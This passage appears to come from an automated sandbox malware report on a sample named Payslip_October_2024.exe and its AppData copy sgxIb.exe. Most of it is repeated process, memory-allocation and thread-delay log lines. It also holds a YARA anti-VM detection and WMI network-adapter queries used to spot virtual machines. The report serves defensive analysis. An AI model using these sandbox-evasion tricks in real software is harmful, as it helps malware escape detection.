                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7952, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 4E60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 8CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 9CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 9EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: AEE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: B580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: C580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: D580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 82B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 92B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 94A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A4A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: AB10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: BB10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: CB10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 4B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: ABF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: BBF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: CBF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: E70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 4BB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599511Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599369Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599263Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 599151Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598991Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598815Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598357Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598116Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597794Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596373Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596153Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 596004Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595760Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595327Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 595108Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594671Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeThread delayed: delay time: 594125Jump to behavior
